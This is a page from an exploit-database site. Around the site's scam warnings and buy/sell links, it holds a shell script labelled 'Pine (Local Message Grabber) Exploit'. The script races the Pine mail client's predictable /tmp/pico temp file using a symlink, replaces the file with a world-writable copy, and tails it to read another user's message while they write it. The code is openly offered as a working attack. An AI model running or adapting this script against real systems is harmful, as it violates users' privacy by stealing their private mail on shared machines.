0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pine (Local Message Grabber) Exploit
==================================== Pine (Local Message Grabber) Exploit ==================================== #!/bin/sh # Grab local pine messages # Usage: ./mon_pine.sh <pid of pine process> # victim pine must use following settings # # mat@hacksware.com # http://hacksware.com # # [x] enable-alternate-editor-cmd # [x] enable-alternate-editor-implicitly # editor = /usr/bin/vi # PID=$1 PICO_FILE=`printf "/tmp/pico.%.6d" $PID` TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"` echo PICO_FILE is $PICO_FILE #if $PICO_FILE and $TRASHCAN exists, remove them if test -f $PICO_FILE then rm -f $PICO_FILE fi if test -f $TRASHCAN then rm -f $TRASHCAN fi ln -s $TRASHCAN $PICO_FILE while : do if test -f $TRASHCAN then break fi done echo Victim is Editing Pine Message rm -f $PICO_FILE echo We replace temporary file touch $PICO_FILE chmod 777 $PICO_FILE echo "Get the message from "$PICO_FILE echo "^C to break tailer" tail -f $PICO_FILE # 0day.today [2024-12-24] #